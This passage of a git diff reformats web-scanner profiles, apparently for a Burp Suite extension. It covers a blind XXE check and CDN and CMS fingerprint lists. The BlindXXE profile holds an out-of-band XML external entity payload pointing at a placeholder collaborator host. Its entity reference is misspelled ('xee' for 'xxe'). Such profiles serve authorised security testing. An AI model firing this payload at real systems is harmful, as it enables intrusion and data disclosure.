-[{"Name":"BlindXXE","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"http://{BC}\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XXE"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"BlindXXE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"BLIND XXE found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "BlindXXE",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"http://{BC}\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [],
+ "Tags": [
+ "XXE",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 0,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "BlindXXE",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "BLIND XXE found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/CDN_Detected.bb b/profiles/CDN_Detected.bb
old mode 100644
new mode 100755
index 07d673d..694da05
--- a/profiles/CDN_Detected.bb
+++ b/profiles/CDN_Detected.bb
@@ -1 +1,127 @@
-[{"Name":"CDN_Detected","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,.clients.turbobytes.net","true,Or,.turbobytes-cdn.com","true,Or,.afxcdn.net","true,Or,.akamai.net","true,Or,.akamaiedge.net","true,Or,.akadns.net","true,Or,.akamaitechnologies.com","true,Or,.gslb.tbcache.com","true,Or,.cloudfront.net","true,Or,.anankecdn.com.br","true,Or,.att-dsa.net","true,Or,.azioncdn.net","true,Or,.belugacdn.com","true,Or,.bluehatnetwork.com","true,Or,.systemcdn.net","true,Or,.cachefly.net","true,Or,.cdn77.net","true,Or,.cdn77.org","true,Or,.panthercdn.com","true,Or,.cdngc.net","true,Or,.gccdn.net","true,Or,.gccdn.cn","true,Or,.cdnify.io","true,Or,.ccgslb.com","true,Or,.ccgslb.net","true,Or,.c3cache.net","true,Or,.chinacache.net","true,Or,.c3cdn.net","true,Or,.lxdns.com","true,Or,.speedcdns.com","true,Or,.mwcloudcdn.com","true,Or,.cloudflare.com","true,Or,.cloudflare.net","true,Or,.edgecastcdn.net","true,Or,.fastly.net","true,Or,.fastlylb.net","true,Or,.googlesyndication.com","true,Or,.googleusercontent.com","true,Or,.l.doubleclick.net","true,Or,.hiberniacdn.com","true,Or,.hwcdn.net","true,Or,.incapdns.net","true,Or,.inscname.net","true,Or,.insnw.net","true,Or,.internapcdn.net","true,Or,.kxcdn.com","true,Or,.lswcdn.net","true,Or,.footprint.net","true,Or,.llnwd.net","true,Or,.lldns.net","true,Or,.netdna-cdn.com","true,Or,.netdna-ssl.com","true,Or,.netdna.com","true,Or,.stackpathdns.com","true,Or,.mncdn.com","true,Or,.instacontent.net","true,Or,.mirror-image.net","true,Or,.cap-mii.net","true,Or,.rncdn1.com","true,Or,.simplecdn.net","true,Or,.swiftcdn1.com","true,Or,.swiftserve.com","true,Or,.gslb.taobao.com","true,Or,.cdn.bitgravity.com","true,Or,.cdn.telefonica.com","true,Or,.vo.msecnd.net","true,Or,.ay1.b.yahoo.com","true,Or,.yimg.com","true,Or,.zenedge.net"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"CDN Detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "CDN_Detected",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,.clients.turbobytes.net",
+ "true,Or,.turbobytes-cdn.com",
+ "true,Or,.afxcdn.net",
+ "true,Or,.akamai.net",
+ "true,Or,.akamaiedge.net",
+ "true,Or,.akadns.net",
+ "true,Or,.akamaitechnologies.com",
+ "true,Or,.gslb.tbcache.com",
+ "true,Or,.cloudfront.net",
+ "true,Or,.anankecdn.com.br",
+ "true,Or,.att-dsa.net",
+ "true,Or,.azioncdn.net",
+ "true,Or,.belugacdn.com",
+ "true,Or,.bluehatnetwork.com",
+ "true,Or,.systemcdn.net",
+ "true,Or,.cachefly.net",
+ "true,Or,.cdn77.net",
+ "true,Or,.cdn77.org",
+ "true,Or,.panthercdn.com",
+ "true,Or,.cdngc.net",
+ "true,Or,.gccdn.net",
+ "true,Or,.gccdn.cn",
+ "true,Or,.cdnify.io",
+ "true,Or,.ccgslb.com",
+ "true,Or,.ccgslb.net",
+ "true,Or,.c3cache.net",
+ "true,Or,.chinacache.net",
+ "true,Or,.c3cdn.net",
+ "true,Or,.lxdns.com",
+ "true,Or,.speedcdns.com",
+ "true,Or,.mwcloudcdn.com",
+ "true,Or,.cloudflare.com",
+ "true,Or,.cloudflare.net",
+ "true,Or,.edgecastcdn.net",
+ "true,Or,.fastly.net",
+ "true,Or,.fastlylb.net",
+ "true,Or,.googlesyndication.com",
+ "true,Or,.googleusercontent.com",
+ "true,Or,.l.doubleclick.net",
+ "true,Or,.hiberniacdn.com",
+ "true,Or,.hwcdn.net",
+ "true,Or,.incapdns.net",
+ "true,Or,.inscname.net",
+ "true,Or,.insnw.net",
+ "true,Or,.internapcdn.net",
+ "true,Or,.kxcdn.com",
+ "true,Or,.lswcdn.net",
+ "true,Or,.footprint.net",
+ "true,Or,.llnwd.net",
+ "true,Or,.lldns.net",
+ "true,Or,.netdna-cdn.com",
+ "true,Or,.netdna-ssl.com",
+ "true,Or,.netdna.com",
+ "true,Or,.stackpathdns.com",
+ "true,Or,.mncdn.com",
+ "true,Or,.instacontent.net",
+ "true,Or,.mirror-image.net",
+ "true,Or,.cap-mii.net",
+ "true,Or,.rncdn1.com",
+ "true,Or,.simplecdn.net",
+ "true,Or,.swiftcdn1.com",
+ "true,Or,.swiftserve.com",
+ "true,Or,.gslb.taobao.com",
+ "true,Or,.cdn.bitgravity.com",
+ "true,Or,.cdn.telefonica.com",
+ "true,Or,.vo.msecnd.net",
+ "true,Or,.ay1.b.yahoo.com",
+ "true,Or,.yimg.com",
+ "true,Or,.zenedge.net"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "CDN Detected",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/CMSDetection.bb b/profiles/CMSDetection.bb
new file mode 100755
index 0000000..e258035
--- /dev/null
+++ b/profiles/CMSDetection.bb
@@ -0,0 +1,71 @@
+[
+ {
+ "ProfileName": "CMSDetection",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Wordpress",
+ "true,Or,Drupal",
+ "true,Or,Joomla",
+ "true,Or,Magento",
+ "true,Or,concre5",
+ "true,Or,SharePoint",
+ "true,Or,django",
+ "true,Or,XOOPS",
+ "true,Or,BigCommerce",
+ "true,Or,Weebly",
+ "true,Or,Ecwid",
+ "true,Or,3dcart",
+ "true,Or,WooCommerce"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "CMSDetection",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "CMS Found: \u003cbr\u003e\u003cgrep\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/CMS_Found.bb b/profiles/CMS_Found.bb
old mode 100644
new mode 100755
index 5ab12c6..9c1d835
--- a/profiles/CMS_Found.bb
+++ b/profiles/CMS_Found.bb
@@ -1 +1,393 @@
-[{"Name":"CMS_Found","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,Wordpress","true,Or,Drupal","true,Or,Joomla","true,Or,Magento","true,Or,Webnode","true,Or,Shopsys","true,Or,Shoptet","true,Or,vBulletin","true,Or,Liferay","true,Or,A-Blog Cms","true,Or,AVE cms","true,Or,Adobe Dreamweaver","true,Or,Adobe GoLive","true,Or,Adobe Muse","true,Or,Advantshop","true,Or,Agility CMS","true,Or,Alterian","true,Or,Amiro.CMS","true,Or,Apache Lenya","true,Or,ASP.NET","true,Or,Backdrop CMS","true,Or,BaseKit","true,Or,Big Cartel","true,Or,Bigace","true,Or,Blogger","true,Or,Bolt","true,Or,Bootply","true,Or,Bricolage CMS","true,Or,C1 CMS","true,Or,CM4all","true,Or,CMS-Tool","true,Or,CMS Made Simple","true,Or,CMSimple","true,Or,CMSimple_XH","true,Or,CanalBlog","true,Or,Cargo","true,Or,Centricity","true,Or,Chevereto","true,Or,Ciashop","true,Or,CivicEngage","true,Or,CoffeeCup","true,Or,CommonSpot","true,Or,Contao","true,Or,Contenido CMS","true,Or,Contensis CMS","true,Or,ContentXXL","true,Or,Convio","true,Or,Coppermine","true,Or,CoreMedia CMS","true,Or,Corepublish","true,Or,Crowd Fusion","true,Or,CubeCart","true,Or,DIAFAN.CMS","true,Or,DNN","true,Or,Danneo","true,Or,DataLife Engine","true,Or,Dealer.com","true,Or,DealerFire","true,Or,Demandware","true,Or,Dim Works","true,Or,Discourse","true,Or,Hycus","true,Or,Discuz!","true,Or,DokuWiki","true,Or,DotClear","true,Or,DotEasy","true,Or,LiteCart","true,Or,DreamCommerce","true,Or,Duda","true,Or,Dynamicweb","true,Or,E+ CMS","true,Or,E-monsite","true,Or,ECShop","true,Or,Easysite","true,Or,EditPlus","true,Or,Edito","true,Or,Enonic CMS","true,Or,Episerver","true,Or,Everweb","true,Or,Fork CMS","true,Or,Zeta Producer","true,Or,Flarum","true,Or,Format","true,Or,FrontPage","true,Or,GX Web Manager","true,Or,Geeklog","true,Or,GetSimple CMS","true,Or,Ghost","true,Or,GoDaddy Website Builder","true,Or,Google Sites","true,Or,Government Site Builder","true,Or,GraffitiCMS","true,Or,Grav CMS","true,Or,Hexo","true,Or,Homes.com Fusion","true,Or,Homestead","true,Or,HostCMS","true,Or,HostedShop","true,Or,HubSpot","true,Or,Hugo","true,Or,HumHub","true,Or,IPS Community Suite","true,Or,ImageCMS","true,Or,Immediacy","true,Or,Imperia CMS","true,Or,ImpressCMS","true,Or,ImpressPages CMS","true,Or,Infopark CMS Fiona","true,Or,InstantCMS","true,Or,InterRed","true,Or,Intershop","true,Or,JTL-Shop","true,Or,Jadu CMS","true,Or,Jekyll","true,Or,JetShop","true,Or,Jieqi CMS","true,Or,Jimdo","true,Or,JustSystems Homepage Builder","true,Or,KVS CMS","true,Or,Koken","true,Or,Komodo CMS","true,Or,Kooboo","true,Or,Kryptronic","true,Or,Labrador CMS","true,Or,Lauyan TOWeb","true,Or,LeadPages","true,Or,LightCMS","true,Or,Lightspeed","true,Or,LiveEdit","true,Or,Livedoor Blog","true,Or,Livestreet CMS","true,Or,Locomotive CMS","true,Or,LogiCommerce","true,Or,Loja Integrada","true,Or,MONO","true,Or,Mabisy","true,Or,MakeShop","true,Or,Mambo","true,Or,MaxSite CMS","true,Or,MediaWiki","true,Or,Medium","true,Or,Melody","true,Or,Metro Publisher","true,Or,Microsoft Word","true,Or,Midgard CMS","true,Or,Mijnwebwinkel","true,Or,Mintox","true,Or,Miva Merchant","true,Or,Mobirise","true,Or,Modified Shopsoftware","true,Or,Modx CMS","true,Or,MoinMoin","true,Or,Movable Type","true,Or,Mura","true,Or,Méthode","true,Or,NQcontent","true,Or,Nation Builder","true,Or,Neos","true,Or,NetObjects","true,Or,NetSuite","true,Or,Netvolution","true,Or,Nextcloud","true,Or,Ning","true,Or,Nodebb","true,Or,Notepad++","true,Or,Nucleus CMS","true,Or,NukeViet","true,Or,OU Campus","true,Or,OXID eSales","true,Or,Octopress","true,Or,Odoo","true,Or,One.com","true,Or,Open CMS","true,Or,Open Journal Systems","true,Or,OpenNemas","true,Or,OpenOffice","true,Or,Orchard","true,Or,Orthodox Web Solutions","true,Or,Osclass","true,Or,Overblog","true,Or,Oxatis","true,Or,PHP-Fusion","true,Or,PHP-Nuke","true,Or,PHP Link Directory","true,Or,PHPShop","true,Or,PHPVibe","true,Or,PageCloud","true,Or,Pagekit","true,Or,Pangea CMS","true,Or,Parallels Presence Builder","true,Or,Pelican","true,Or,Perch","true,Or,Percussion","true,Or,Pimcore","true,Or,Piwigo","true,Or,Plone","true,Or,PowerBoutique","true,Or,PrestaShop","true,Or,ProcessWire","true,Or,Pydio","true,Or,Quick.CMS","true,Or,Quick.Cart","true,Or,RCMS","true,Or,RVsitebuilder","true,Or,RapidWeaver","true,Or,Ready Pro Ecommerce","true,Or,Ruby on Rails","true,Or,SNworks","true,Or,SUMOshop","true,Or,Salesforce","true,Or,Sana Commerce","true,Or,Sandvox","true,Or,SchoolSitePro","true,Or,Seamless CMS","true,Or,SeoToaster","true,Or,Serendipity","true,Or,Setup.ru","true,Or,SharePoint","true,Or,ShopFactory","true,Or,Shopify","true,Or,Shoptet","true,Or,Shopware","true,Or,Showoff","true,Or,SilverStripe CMS","true,Or,Simple Machines Forum","true,Or,Siquando","true,Or,SiteDirect","true,Or,SiteKreator","true,Or,SitePad","true,Or,SiteSpinner","true,Or,Sitefinity","true,Or,Sitonline","true,Or,Sitoo","true,Or,SmartEtailing","true,Or,SmartStore.NET","true,Or,SmugMug","true,Or,SocialEngine","true,Or,Sparkle CMS","true,Or,Spip","true,Or,Squarespace","true,Or,Squiz","true,Or,Strikingly","true,Or,Sulu CMS","true,Or,Tailbase","true,Or,Tangora Web CMS","true,Or,Telligent","true,Or,Tempest","true,Or,Textalk Webshop","true,Or,Textpattern CMS","true,Or,ThinkCMF","true,Or,ThinkPHP","true,Or,Ticimax","true,Or,Tiki Wiki CMS","true,Or,Tilda","true,Or,Trellix","true,Or,Tumblr","true,Or,TypePad","true,Or,Typecho","true,Or,Typesetter","true,Or,Typo3","true,Or,UBB.threads","true,Or,UMI.CMS","true,Or,Ultimize CMS","true,Or,Umbraco","true,Or,Vanilla Forums","true,Or,Vigbo","true,Or,Vision","true,Or,Visual Studio","true,Or,Visualsoft","true,Or,Vivvo","true,Or,Volusion","true,Or,WMaker","true,Or,WYSIWYG Web Builder","true,Or,Web 2 Date","true,Or,WebAcappella","true,Or,Web Commander","true,Or,WebGUI","true,Or,Web Page Maker","true,Or,WebPlus","true,Or,Web Presence Builder","true,Or,Web Shop Manager","true,Or,WebSite Tonight","true,Or,WebSphere Studio Homepage Builder","true,Or,Webflow","true,Or,Weblication","true,Or,Webs","true,Or,Websale","true,Or,WebsiteBuilder","true,Or,WebSite X5","true,Or,Websplanet","true,Or,Webvision","true,Or,Weebly","true,Or,Wheel CMS","true,Or,Wikispaces","true,Or,Wix","true,Or,WiziShop","true,Or,WoltLab","true,Or,XT-Commerce","true,Or,Xara","true,Or,XenForo","true,Or,Xiuno BBS","true,Or,Xoops","true,Or,XpressEngine","true,Or,X‑Cart","true,Or,YaBB","true,Or,Yahoo Small Business","true,Or,Yellow Pages Canada","true,Or,Yola","true,Or,ZMS","true,Or,Zen Cart","true,Or,Zendesk","true,Or,Zoho Sites","true,Or,Zyro","true,Or,b2evolution","true,Or,blog.ir","true,Or,cloudrexx","true,Or,concrete5","true,Or,docsify","true,Or,dotCMS","true,Or,e107","true,Or,ePages","true,Or,eSyndiCat","true,Or,eZ Publish","true,Or,elcomCMS","true,Or,fCMS","true,Or,iWeb","true,Or,kimsq","true,Or,nopCommerce","true,Or,onpublix CMS","true,Or,1C-Bitrix","true,Or,pTools","true,Or,phpwcms","true,Or,phpwind","true,Or,plentymarkets","true,Or,uCoz"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"CMS Detected","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"CMS Detected","RemediationDetail":"CMS Detected","IssueBackground":"CMS Detected","RemediationBackground":"CMS Detected","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "CMS_Found",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Wordpress",
+ "true,Or,Drupal",
+ "true,Or,Joomla",
+ "true,Or,Magento",
+ "true,Or,Webnode",
+ "true,Or,Shopsys",
+ "true,Or,Shoptet",
+ "true,Or,vBulletin",
+ "true,Or,Liferay",
+ "true,Or,A-Blog Cms",
+ "true,Or,AVE cms",
+ "true,Or,Adobe Dreamweaver",
+ "true,Or,Adobe GoLive",
+ "true,Or,Adobe Muse",
+ "true,Or,Advantshop",
+ "true,Or,Agility CMS",
+ "true,Or,Alterian",
+ "true,Or,Amiro.CMS",
+ "true,Or,Apache Lenya",
+ "true,Or,ASP.NET",
+ "true,Or,Backdrop CMS",
+ "true,Or,BaseKit",
+ "true,Or,Big Cartel",
+ "true,Or,Bigace",
+ "true,Or,Blogger",
+ "true,Or,Bolt",
+ "true,Or,Bootply",
+ "true,Or,Bricolage CMS",
+ "true,Or,C1 CMS",
+ "true,Or,CM4all",
+ "true,Or,CMS-Tool",
+ "true,Or,CMS Made Simple",
+ "true,Or,CMSimple",
+ "true,Or,CMSimple_XH",
+ "true,Or,CanalBlog",
+ "true,Or,Cargo",
+ "true,Or,Centricity",
+ "true,Or,Chevereto",
+ "true,Or,Ciashop",
+ "true,Or,CivicEngage",
+ "true,Or,CoffeeCup",
+ "true,Or,CommonSpot",
+ "true,Or,Contao",
+ "true,Or,Contenido CMS",
+ "true,Or,Contensis CMS",
+ "true,Or,ContentXXL",
+ "true,Or,Convio",
+ "true,Or,Coppermine",
+ "true,Or,CoreMedia CMS",
+ "true,Or,Corepublish",
+ "true,Or,Crowd Fusion",
+ "true,Or,CubeCart",
+ "true,Or,DIAFAN.CMS",
+ "true,Or,DNN",
+ "true,Or,Danneo",
+ "true,Or,DataLife Engine",
+ "true,Or,Dealer.com",
+ "true,Or,DealerFire",
+ "true,Or,Demandware",
+ "true,Or,Dim Works",
+ "true,Or,Discourse",
+ "true,Or,Hycus",
+ "true,Or,Discuz!",
+ "true,Or,DokuWiki",
+ "true,Or,DotClear",
+ "true,Or,DotEasy",
+ "true,Or,LiteCart",
+ "true,Or,DreamCommerce",
+ "true,Or,Duda",
+ "true,Or,Dynamicweb",
+ "true,Or,E+ CMS",
+ "true,Or,E-monsite",
+ "true,Or,ECShop",
+ "true,Or,Easysite",
+ "true,Or,EditPlus",
+ "true,Or,Edito",
+ "true,Or,Enonic CMS",
+ "true,Or,Episerver",
+ "true,Or,Everweb",
+ "true,Or,Fork CMS",
+ "true,Or,Zeta Producer",
+ "true,Or,Flarum",
+ "true,Or,Format",
+ "true,Or,FrontPage",
+ "true,Or,GX Web Manager",
+ "true,Or,Geeklog",
+ "true,Or,GetSimple CMS",
+ "true,Or,Ghost",
+ "true,Or,GoDaddy Website Builder",
+ "true,Or,Google Sites",
+ "true,Or,Government Site Builder",
+ "true,Or,GraffitiCMS",
+ "true,Or,Grav CMS",
+ "true,Or,Hexo",
+ "true,Or,Homes.com Fusion",
+ "true,Or,Homestead",
+ "true,Or,HostCMS",
+ "true,Or,HostedShop",
+ "true,Or,HubSpot",
+ "true,Or,Hugo",
+ "true,Or,HumHub",
+ "true,Or,IPS Community Suite",
+ "true,Or,ImageCMS",
+ "true,Or,Immediacy",
+ "true,Or,Imperia CMS",
+ "true,Or,ImpressCMS",
+ "true,Or,ImpressPages CMS",
+ "true,Or,Infopark CMS Fiona",
+ "true,Or,InstantCMS",
+ "true,Or,InterRed",
+ "true,Or,Intershop",
+ "true,Or,JTL-Shop",
+ "true,Or,Jadu CMS",
+ "true,Or,Jekyll",
+ "true,Or,JetShop",
+ "true,Or,Jieqi CMS",
+ "true,Or,Jimdo",
+ "true,Or,JustSystems Homepage Builder",
+ "true,Or,KVS CMS",
+ "true,Or,Koken",
+ "true,Or,Komodo CMS",
+ "true,Or,Kooboo",
+ "true,Or,Kryptronic",
+ "true,Or,Labrador CMS",
+ "true,Or,Lauyan TOWeb",
+ "true,Or,LeadPages",
+ "true,Or,LightCMS",
+ "true,Or,Lightspeed",
+ "true,Or,LiveEdit",
+ "true,Or,Livedoor Blog",
+ "true,Or,Livestreet CMS",
+ "true,Or,Locomotive CMS",
+ "true,Or,LogiCommerce",
+ "true,Or,Loja Integrada",
+ "true,Or,MONO",
+ "true,Or,Mabisy",
+ "true,Or,MakeShop",
+ "true,Or,Mambo",
+ "true,Or,MaxSite CMS",
+ "true,Or,MediaWiki",
+ "true,Or,Medium",
+ "true,Or,Melody",
+ "true,Or,Metro Publisher",
+ "true,Or,Microsoft Word",
+ "true,Or,Midgard CMS",
+ "true,Or,Mijnwebwinkel",
+ "true,Or,Mintox",
+ "true,Or,Miva Merchant",
+ "true,Or,Mobirise",
+ "true,Or,Modified Shopsoftware",
+ "true,Or,Modx CMS",
+ "true,Or,MoinMoin",
+ "true,Or,Movable Type",
+ "true,Or,Mura",
+ "true,Or,Méthode",
+ "true,Or,NQcontent",
+ "true,Or,Nation Builder",
+ "true,Or,Neos",
+ "true,Or,NetObjects",
+ "true,Or,NetSuite",
+ "true,Or,Netvolution",
+ "true,Or,Nextcloud",
+ "true,Or,Ning",
+ "true,Or,Nodebb",
+ "true,Or,Notepad++",
+ "true,Or,Nucleus CMS",
+ "true,Or,NukeViet",
+ "true,Or,OU Campus",
+ "true,Or,OXID eSales",
+ "true,Or,Octopress",
+ "true,Or,Odoo",
+ "true,Or,One.com",
+ "true,Or,Open CMS",
+ "true,Or,Open Journal Systems",
+ "true,Or,OpenNemas",
+ "true,Or,OpenOffice",
+ "true,Or,Orchard",
+ "true,Or,Orthodox Web Solutions",
+ "true,Or,Osclass",
+ "true,Or,Overblog",
+ "true,Or,Oxatis",
+ "true,Or,PHP-Fusion",
+ "true,Or,PHP-Nuke",
+ "true,Or,PHP Link Directory",
+ "true,Or,PHPShop",
+ "true,Or,PHPVibe",
+ "true,Or,PageCloud",
+ "true,Or,Pagekit",
+ "true,Or,Pangea CMS",
+ "true,Or,Parallels Presence Builder",
+ "true,Or,Pelican",
+ "true,Or,Perch",
+ "true,Or,Percussion",
+ "true,Or,Pimcore",
+ "true,Or,Piwigo",
+ "true,Or,Plone",
+ "true,Or,PowerBoutique",
+ "true,Or,PrestaShop",
+ "true,Or,ProcessWire",
+ "true,Or,Pydio",
+ "true,Or,Quick.CMS",
+ "true,Or,Quick.Cart",
+ "true,Or,RCMS",
+ "true,Or,RVsitebuilder",
+ "true,Or,RapidWeaver",
+ "true,Or,Ready Pro Ecommerce",
+ "true,Or,Ruby on Rails",
+ "true,Or,SNworks",
+ "true,Or,SUMOshop",
+ "true,Or,Salesforce",
+ "true,Or,Sana Commerce",
+ "true,Or,Sandvox",
+ "true,Or,SchoolSitePro",
+ "true,Or,Seamless CMS",
+ "true,Or,SeoToaster",
+ "true,Or,Serendipity",
+ "true,Or,Setup.ru",
+ "true,Or,SharePoint",
+ "true,Or,ShopFactory",
+ "true,Or,Shopify",
+ "true,Or,Shoptet",
+ "true,Or,Shopware",
+ "true,Or,Showoff",
+ "true,Or,SilverStripe CMS",
+ "true,Or,Simple Machines Forum",
+ "true,Or,Siquando",
+ "true,Or,SiteDirect",
+ "true,Or,SiteKreator",
+ "true,Or,SitePad",
+ "true,Or,SiteSpinner",
+ "true,Or,Sitefinity",
+ "true,Or,Sitonline",
+ "true,Or,Sitoo",
+ "true,Or,SmartEtailing",
+ "true,Or,SmartStore.NET",
+ "true,Or,SmugMug",
+ "true,Or,SocialEngine",
+ "true,Or,Sparkle CMS",
+ "true,Or,Spip",
+ "true,Or,Squarespace",
+ "true,Or,Squiz",
+ "true,Or,Strikingly",
+ "true,Or,Sulu CMS",
+ "true,Or,Tailbase",
+ "true,Or,Tangora Web CMS",
+ "true,Or,Telligent",
+ "true,Or,Tempest",
+ "true,Or,Textalk Webshop",
+ "true,Or,Textpattern CMS",
+ "true,Or,ThinkCMF",
+ "true,Or,ThinkPHP",
